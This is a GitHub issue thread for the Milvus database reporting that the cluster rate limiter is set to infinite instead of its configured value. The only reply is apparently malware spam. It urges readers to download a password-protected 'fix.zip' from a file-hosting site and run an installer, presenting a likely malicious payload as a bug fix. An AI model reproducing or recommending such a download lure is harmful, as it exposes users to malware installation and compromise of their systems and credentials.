### ISSUE TITLE
[Bug]: The cluster rate limiter isn’t working as expected

### ISSUE THREAD

**Issue by bigsheeper** [milvus-io/milvus#35702]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Environment

```markdown
- Milvus version:master&2.4
- Deployment mode(standalone or cluster):
- MQ type(rocksmq, pulsar or kafka):    
- SDK version(e.g. pymilvus v2.0.0rc2):
- OS(Ubuntu or CentOS): 
- CPU/Memory: 
- GPU: 
- Others:
```

### Current Behavior

The cluster limiter rate was set to infinite instead of the configuration, which is why it’s not working as expected.
https://github.com/milvus-io/milvus/blob/7d3c0d748c647586adbd0339cd2f926171d04feb/internal/rootcoord/quota_center.go#L1286

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
